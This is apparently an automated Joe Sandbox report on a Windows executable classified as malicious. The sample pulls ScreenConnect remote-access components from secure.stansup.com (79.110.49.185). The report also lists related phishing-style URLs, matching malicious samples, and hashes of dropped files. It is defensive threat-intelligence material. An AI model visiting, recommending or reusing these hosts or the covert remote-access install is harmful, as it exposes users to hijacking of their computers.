https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.Core.dll | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://crl3.digicekhwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://login.ecursvchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://account.live.com/Wizard/Password/Change?id=806013svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.manifestn1CDdfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhemasvchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://secure.stansup.com/Bin/ScreeTXdfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:Ssvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000008.00000003.1517183349.00000189C5F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Windows.dll#dfsvc.exe, 00000002.00000002.2495464552.000001D459317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://Passport.NET/STSsvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpC9fPITAsvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecusvchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABGI2aS3asvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.w3.odfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F166000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F13A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application#Scre0dfsvc.exe, 00000002.00000002.2495433381.000001D45930D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://Passport.NET/tbsvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690008650.00000189C642D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000008.00000003.1469053153.00000189C5F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu-1.0svchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
79.110.49.185 | secure.stansup.com | Germany | 57287 | OTAVANET-ASCZ | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542314
Start date and time: 2024-10-25 19:26:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: khwHsyfsJ1.exe (renamed because original name is a hash value)
Original Sample Name: 89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal66.evad.winEXE@18/77@2/2
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 83.3%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 77%
                                                                                                                                                                                                                • Number of executed functions: 271
                                                                                                                                                                                                                • Number of non-executed functions: 30
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.190.159.64, 40.126.31.67, 20.190.159.68, 20.190.159.75, 40.126.31.73, 20.190.159.71, 20.190.159.4, 40.126.31.69, 84.201.210.34, 192.229.221.95, 184.28.90.27, 52.168.117.173, 93.184.221.240
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 4332 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: khwHsyfsJ1.exe
Time | Type | Description
13:27:12 | API Interceptor | 1294042x Sleep call for process: dfsvc.exe modified
13:27:13 | API Interceptor | 1x Sleep call for process: khwHsyfsJ1.exe modified
13:27:15 | API Interceptor | 2x Sleep call for process: svchost.exe modified
13:27:21 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                    https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe | xrWUzly94Z.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | EPCo9k8NIn.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | X5zNv1VJia.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | AmedVA2n92.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse |
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.4932373033622139
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztac:cJhXC9lHmutpJyiRDeJ/aUKrDgnme
                                                                                                                                                                                                                                                        MD5:CC0970982F8EC1852B0F6197F30634D2
                                                                                                                                                                                                                                                        SHA1:C44DB13A2B44E988D7FB7594B188991F359FFF7D
                                                                                                                                                                                                                                                        SHA-256:A6FE690A444FDAAE66E4A0822A39078334617918E88ECDDF46B7BF7B24D35BEB
                                                                                                                                                                                                                                                        SHA-512:F43F6C709CD8B4DEB7C8F9D6C24529819A8EE90F769685BFF17EA3907266B51738530144A428F8C4AEB50938491B071D5D56E7FAC6FE2723A31A4C206E026E82
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x867a2d70, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.7217373328847188
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:rSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:razaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                                                                        MD5:6B2A32A50A32CBF26BE67E71533CDF38
                                                                                                                                                                                                                                                        SHA1:C22086C7691549EDFEECFE90799B842D1085A4B1
                                                                                                                                                                                                                                                        SHA-256:255A7370033F63FE1A07A2B91DD81F8FD3705CD8B2A73A4ED9D428125FF0CADB
                                                                                                                                                                                                                                                        SHA-512:FE9BCED8E438BA894669F8DE6BB849ADC79CE7A776A6223A76F8E5CB736DB549ACF0671672A0E0DFBFDBA8EFAAA30B0668F3DD23BADC8A1E8AD0DA3182707BA1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                        Entropy (8bit):0.08153764902110348
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:ke8YedL8/r/fgsCrZClW/tfLall+SHY/Xl+/rQLve:kFzdLmfgs3GNqAS4M
                                                                                                                                                                                                                                                        MD5:1E35809FE435379FFEC8CD9545C0665A
                                                                                                                                                                                                                                                        SHA1:619DCA51D6F1C18FA085AC9E0171380387DD082D
                                                                                                                                                                                                                                                        SHA-256:066608E083B0DFB800AE3532363744D02C3B12C3B6E7E36BFCB5CA59C653F566
                                                                                                                                                                                                                                                        SHA-512:2689656EA79C1486B92579FF592103FD02BC9FC6FD4010CA0CD6AF57FF707BE58C663516719F6F917B40949723B9D841AA21446E6F1BE17975D3B7657644802C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                        Entropy (8bit):0.911148570773437
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:oKF9O64KZsFhqnGXyf8QXIDcQvc6QcEVcw3cE/jjn+HbHg/Jg+OgBCXEYcI+1sio:7dnZbX0BU/Hjsjq0ozuiFMZ24IO8/o3
                                                                                                                                                                                                                                                        MD5:3EC5D0E14E279AAB8C6C2EE457A514BC
                                                                                                                                                                                                                                                        SHA1:0B252057739DEC6F092287F9E9AD8DC3769F6743
                                                                                                                                                                                                                                                        SHA-256:2C8CADE2284865093120177452E65503AEFED4709B50E3B199588B15B21274EE
                                                                                                                                                                                                                                                        SHA-512:185AD7C7AD5D3E9B2DE14C26D2E69944274922CAC0A4F8D7346BA79398B71CDA0236EF36926526107732F93D39856AFF14D1139EA51CBC2CC7F605CAFFDCE6CA
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.4.8.5.4.8.9.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.5.6.0.4.8.8.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.b.b.e.d.a.8.-.9.d.f.9.-.4.3.1.d.-.b.0.5.b.-.a.a.7.1.3.4.e.7.c.c.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.d.1.4.5.4.a.-.7.6.5.d.-.4.9.f.d.-.b.7.0.9.-.5.e.e.e.d.b.8.1.5.2.f.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.h.w.H.s.y.f.s.J.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.8.c.-.0.0.0.1.-.0.0.1.4.-.e.3.1.3.-.a.d.2.0.0.3.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.c.8.5.9.d.f.c.4.b.0.d.3.2.f.2.3.8.8.b.5.a.3.8.4.e.6.3.b.8.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.8.c.8.3.0.e.8.7.8.b.6.f.1.d.5.a.b.6.3.1.8.1.f.e.c.3.d.b.f.4.f.c.9.1.f.2.4.4.2.!.k.h.w.H.s.y.f.s.J.1...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:15 2024, 0x1205a4 type
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80988
                                                                                                                                                                                                                                                        Entropy (8bit):1.6918236912453386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:z3EtWXDZeOhI/DFaWnI3+rVI1BU23CVU/RYq48QvJbWjW5VNezFlsLcOe:wtmhI/RaGVUUgqUvmJvfaTSc
                                                                                                                                                                                                                                                        MD5:748152C985563DB87D8F2C0A5B19E89C
                                                                                                                                                                                                                                                        SHA1:B5567AE7D7C930877171C0C4477BAAC0AC2094AA
                                                                                                                                                                                                                                                        SHA-256:9E30E9014DC25364B1503B9027A89D77B707BA93E1551C1EBD62F6FED8E27DC1
                                                                                                                                                                                                                                                        SHA-512:CF39069D3EBA45346E8C80CCB17884AB795EB82086435BE75C91007D0B660B6E606895378F7186CD786FF792EE163B3A85223FA31DB50F7D0A1F79EF0BC9DF85
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MDMP..a..... ..........g....................................$....;..........T.......8...........T............!.............. ...........................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8322
                                                                                                                                                                                                                                                        Entropy (8bit):3.702972060546426
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJg46R6YcDfSUWh1BgmfTtRpr489bHHUsfkNHm:R6lXJf6R6Y4SUWh1BgmfTt5HHHfiG
                                                                                                                                                                                                                                                        MD5:FBB632163D754A388B6C92D6D05868D6
                                                                                                                                                                                                                                                        SHA1:A44BB739E6E6FEA7DAD0EF62B3358729594F973B
                                                                                                                                                                                                                                                        SHA-256:83E933033071305820FE604442030941666EDC1B616B948A7680F985563A62F2
                                                                                                                                                                                                                                                        SHA-512:C6672ABC39BF37D9E98563E13921257122318384E359C3C04576D9FC07BB08570137512AD7E378B1DA52B54B175F81BECE33DC4C3CF6B184B61AF91DF2340609
                                                                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>652</Pid
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4593
                                                                                                                                                                                                                                                        Entropy (8bit):4.483813214537682
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsWJg77aI9dCWpW8VYbYm8M4JhLFF+q88VbaF1V7ghdd:uIjfsI7HD7VnJVVaF1V7ghdd
                                                                                                                                                                                                                                                        MD5:A9009B324E1B7DF8B8CC3275D07973C9
                                                                                                                                                                                                                                                        SHA1:5FF0F6945E6FAA7B34E9F05CCFBA29AAB4297049
